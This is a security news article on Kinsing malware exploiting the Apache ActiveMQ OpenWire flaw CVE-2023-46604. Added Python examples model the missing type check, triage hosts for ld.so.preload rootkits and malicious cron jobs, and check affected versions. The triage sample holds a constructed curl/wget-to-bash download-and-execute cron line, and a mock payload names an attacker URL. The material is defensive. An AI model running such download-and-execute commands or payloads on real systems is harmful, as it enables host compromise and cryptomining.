Hackers Infect Linux Machines with Rootkits via Apache ActiveMQ Vulnerability

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer


Apache ActiveMQ is a Java-based open-source message broker that lets distributed applications exchange messages.

It implements the JMS API to provide a dependable messaging platform for sharing data across systems written in diverse programming languages.

It supports the following messaging protocols and APIs:-

  • STOMP
  • Jakarta Messaging (JMS)
  • OpenWire

Trend Micro researchers recently revealed that the Apache ActiveMQ vulnerability CVE-2023-46604 is being actively exploited to infect Linux systems with Kinsing malware. The flaw leads to RCE because the OpenWire marshaller does not validate that a class named in an OpenWire command is actually a Throwable before instantiating it.


Hackers Infect Linux Machines

Kinsing malware spreads rapidly across a network by infiltrating servers; it primarily targets Linux systems by exploiting vulnerable web applications or misconfigured containers.

Kinsing actors have also exploited CVE-2023-4911 (Looney Tunables) to deploy cryptocurrency-mining scripts, which degrade the performance of infected systems and put a strain on the surrounding infrastructure.

OpenWire, ActiveMQ's native binary protocol, is suited to high-performance communication, which is why it is widely used in business deployments. A diff of the patch reveals a new validateIsThrowable method in the BaseDataStreamMarshaller class.

The validateIsThrowable method (Source – Trend Micro)

If the marshaller does not check that the class named in the stream is a Throwable, it will instantiate an unexpected class chosen by the remote peer, and that class's constructor runs with the broker's privileges; this is what turns a deserialization quirk into an RCE.

Validating the Throwable class type before instantiation is therefore essential to close the hole.
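To make the missing check concrete, here is an added example (not ActiveMQ code, and not from Trend Micro's write-up) that models the shape of the Java createThrowable logic in Python: two peer-controlled length-prefixed UTF fields (class name, message) are read, the class is resolved by name, and its single-string constructor is called. The unchecked variant instantiates whatever class is named; the checked variant adds the equivalent of validateIsThrowable. The payload bytes, the attacker.invalid URL and the use of io.StringIO as a harmless stand-in for a class with a one-string constructor are all constructed for the demonstration.

```python
"""Model of the OpenWire marshaller flaw behind CVE-2023-46604.

Added example, not ActiveMQ code: the real createThrowable lives in Java
(BaseDataStreamMarshaller) and this Python stand-in mirrors its shape.  The
peer supplies a class name and a message as two length-prefixed UTF strings;
the marshaller resolves the class by name and calls its single-string
constructor.  The unchecked variant instantiates whatever class is named.  The
checked variant first verifies the resolved type is an exception type, which
is what the upstream validateIsThrowable check does for java.lang.Throwable.
"""
import importlib
import io
import struct


def _write_utf(out: io.BytesIO, text: str) -> None:
    """DataOutput.writeUTF-style field: 2-byte big-endian length, then bytes."""
    data = text.encode("utf-8")
    out.write(struct.pack(">H", len(data)))
    out.write(data)


def _read_utf(inp: io.BytesIO) -> str:
    (length,) = struct.unpack(">H", inp.read(2))
    return inp.read(length).decode("utf-8")


def encode_exception_response(class_name: str, message: str) -> bytes:
    """Build the two peer-controlled fields of an exception response (constructed input)."""
    out = io.BytesIO()
    _write_utf(out, class_name)
    _write_utf(out, message)
    return out.getvalue()


def resolve_class(dotted_name: str) -> type:
    """Stand-in for Class.forName: 'pkg.module.Name' -> class object."""
    module_name, _, attr = dotted_name.rpartition(".")
    cls = getattr(importlib.import_module(module_name or "builtins"), attr)
    if not isinstance(cls, type):
        raise TypeError(f"{dotted_name} is not a class")
    return cls


def create_throwable_unchecked(payload: bytes) -> object:
    """Pre-patch shape: resolve the named class and construct it with the message.
    Any class on the 'classpath' that accepts one string gets instantiated."""
    inp = io.BytesIO(payload)
    class_name = _read_utf(inp)
    message = _read_utf(inp)
    return resolve_class(class_name)(message)


def validate_is_throwable(cls: type) -> None:
    """Analogue of validateIsThrowable: refuse anything that is not an exception type."""
    if not issubclass(cls, BaseException):
        raise ValueError(f"Class {cls.__module__}.{cls.__qualname__} is not assignable to Throwable")


def create_throwable_checked(payload: bytes) -> BaseException:
    """Patched shape: resolve, validate the type, and only then instantiate."""
    inp = io.BytesIO(payload)
    class_name = _read_utf(inp)
    message = _read_utf(inp)
    cls = resolve_class(class_name)
    validate_is_throwable(cls)
    return cls(message)


def demo() -> dict:
    """Run both variants against a hostile and a benign payload (constructed data).
    io.StringIO stands in for a harmless 'gadget' class with a one-string constructor."""
    hostile = encode_exception_response("io.StringIO", "http://attacker.invalid/poc.xml")
    benign = encode_exception_response("builtins.RuntimeError", "broker rejected message")
    results = {"unchecked_instantiates": type(create_throwable_unchecked(hostile)).__name__}
    try:
        create_throwable_checked(hostile)
        results["checked_rejects_gadget"] = False
    except ValueError:
        results["checked_rejects_gadget"] = True
    exc = create_throwable_checked(benign)
    results["checked_accepts_exception"] = isinstance(exc, RuntimeError) and str(exc) == "broker rejected message"
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the check is its position: the type test happens after the name is resolved but before any constructor runs, so a hostile class name is never given the chance to execute. A check placed after instantiation would be too late.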

Active exploitation of CVE-2023-46604 was reported in November by several threat actors, including the HelloKitty ransomware group. Despite a CVSS score of 9.8, overall detections remained low, even though proof-of-concept exploits are publicly available in:-

  • Metasploit
  • Nuclei

Kinsing's exploit for CVE-2023-46604 uses Java's ProcessBuilder to run shell commands that download cryptocurrency miners and additional malware.

It then hunts for and kills rival miners on the host and establishes persistence through cron jobs and a rootkit loaded via /etc/ld.so.preload, giving it full control of the compromised system.
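The two persistence mechanisms named above are also the quickest things to check on a suspect host. The following is an added triage script (not Trend Micro's or the article's code) that reports every entry in /etc/ld.so.preload, which the dynamic loader injects into every dynamically linked process and which is normally absent or empty on a stock server, and flags cron lines that fetch something with curl or wget and chain it into a shell. The sample crontab, the library path and the 198.51.100.7 address are constructed; scan_host() is what you would point at a real filesystem.

```python
"""Host triage for the Kinsing persistence mechanisms described above.

Added example, not Trend Micro's or the article's code.  Two checks:
  * /etc/ld.so.preload: the dynamic loader injects every library listed here
    into every dynamically linked process, which is how userland rootkits hide
    files and processes.  On a stock server the file is absent or empty, so any
    entry is a finding.
  * cron: lines whose command fetches something with curl/wget and pipes or
    chains it into a shell, the usual "re-download the miner" loop.
All sample contents, paths and the 198.51.100.7 address below are constructed.
"""
import re
import tempfile
from pathlib import Path

# curl/wget ... followed by "| sh", "; sh" or "&& sh" (bash included)
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b.*?(?:\||;|&&)\s*(?:ba)?sh\b", re.IGNORECASE)

SAMPLE_PRELOAD = "/usr/local/lib/libexample_hook.so\n"          # constructed
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *  * * * root cd / && run-parts --report /etc/cron.hourly
0  3  * * * root /usr/bin/certbot renew --quiet
*  *  * * * root (curl -s http://198.51.100.7/unk.sh || wget -q -O- http://198.51.100.7/unk.sh) | bash >/dev/null 2>&1
"""


def preload_findings(content: str) -> list[str]:
    """Every non-empty, non-comment line of ld.so.preload is reported."""
    return [ln.strip() for ln in content.splitlines() if ln.strip() and not ln.lstrip().startswith("#")]


def cron_findings(content: str) -> list[str]:
    """Return crontab lines whose command part looks like download-and-execute."""
    hits = []
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment or VAR=value line
        if DOWNLOAD_EXEC.search(line):
            hits.append(line)
    return hits


def scan_host(root: str = "/") -> dict[str, list[str]]:
    """Read-only scan of the real files under `root`; returns {path: findings}."""
    base = Path(root)
    findings: dict[str, list[str]] = {}
    preload = base / "etc/ld.so.preload"
    if preload.is_file():
        hits = preload_findings(preload.read_text(errors="replace"))
        if hits:
            findings[str(preload)] = hits
    cron_files = [base / "etc/crontab"]
    for d in ("etc/cron.d", "var/spool/cron", "var/spool/cron/crontabs"):
        p = base / d
        if p.is_dir():
            cron_files.extend(c for c in p.iterdir() if c.is_file())
    for f in cron_files:
        try:
            hits = cron_findings(f.read_text(errors="replace"))
        except OSError:
            continue                      # unreadable or vanished; skip
        if hits:
            findings[str(f)] = hits
    return findings


def demo_scan() -> dict[str, list[str]]:
    """Build a throwaway fake root from the constructed samples and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "etc").mkdir()
    (root / "etc/ld.so.preload").write_text(SAMPLE_PRELOAD)
    (root / "etc/crontab").write_text(SAMPLE_CRONTAB)
    return scan_host(str(root))


if __name__ == "__main__":
    for path, hits in demo_scan().items():
        for h in hits:
            print(f"{path}: {h}")
```

One caveat when running this on a live host: an ld.so.preload rootkit can hook the libc calls that Python itself uses to read files and list directories, so a clean result from an on-box scan is weaker evidence than the same scan run against the disk image or from a rescue environment.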

Flaw profile

  • CVE ID: CVE-2023-46604
  • Description: The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath.
  • Base Score: 9.8
  • Severity: Critical
  • NVD Published Date: 10/27/2023
  • NVD Last Modified: 11/20/2023
  • Source: Apache Software Foundation

Affected ActiveMQ versions

The affected versions are:-

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
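Checking an inventory of brokers against these ranges is error-prone if done by eye or with string comparison (as a string, "5.9.0" sorts after "5.15.16"). The following is an added example (not project code) that encodes the ranges above as numeric tuples and reports the first fixed release for each affected version; the version strings it is run on are constructed. The legacy OpenWire module shares the same fixed versions, its oldest release simply being 5.8.0.

```python
"""Added example (not project code): flag ActiveMQ versions that fall inside the
affected ranges listed above, using numeric tuple comparison so that 5.9.0
correctly sorts below 5.15.16 (a plain string compare would get this backwards).
The version strings fed to it are constructed."""
import re
from typing import Optional

Version = tuple[int, int, int]

# (first affected version, or None for "every older release"; first fixed version)
# The legacy OpenWire module shares the same fixed versions (its oldest release is 5.8.0).
AFFECTED_RANGES: list[tuple[Optional[Version], Version]] = [
    (None,       (5, 15, 16)),   # before 5.15.16
    ((5, 16, 0), (5, 16, 7)),    # 5.16.0 before 5.16.7
    ((5, 17, 0), (5, 17, 6)),    # 5.17.0 before 5.17.6
    ((5, 18, 0), (5, 18, 3)),    # 5.18.0 before 5.18.3
]

_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Version:
    """Parse 'major.minor[.patch][-suffix]' into a comparable tuple."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def fixed_version_for(version: str) -> Optional[str]:
    """Return the first fixed release for an affected version, or None if not affected."""
    v = parse_version(version)
    for lower, fixed in AFFECTED_RANGES:
        if (lower is None or v >= lower) and v < fixed:
            return ".".join(map(str, fixed))
    return None


def is_affected(version: str) -> bool:
    return fixed_version_for(version) is not None


def triage(versions: list[str]) -> dict[str, Optional[str]]:
    """Map each inventory entry to its patch target (None = already safe)."""
    return {v: fixed_version_for(v) for v in versions}


if __name__ == "__main__":
    # constructed inventory
    for ver, fix in triage(["5.9.0", "5.15.15", "5.15.16", "5.16.6", "5.17.6", "5.18.2", "5.18.3"]).items():
        print(f"{ver:>8}: {'upgrade to ' + fix if fix else 'not affected'}")
```

Note that the first range has no lower bound, so any 5.x release older than 5.15.16, including pre-5.8 brokers that never shipped the legacy module, is still reported as affected.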

The widespread exploitation of CVE-2023-46604, notably by Kinsing malware, poses a significant global security risk.

Apache ActiveMQ users should therefore patch urgently and hunt for signs of Kinsing activity. As mitigations, and as part of a robust cybersecurity strategy, the researchers recommend:-

  • Regular patching
  • Configuration audits
  • Network monitoring
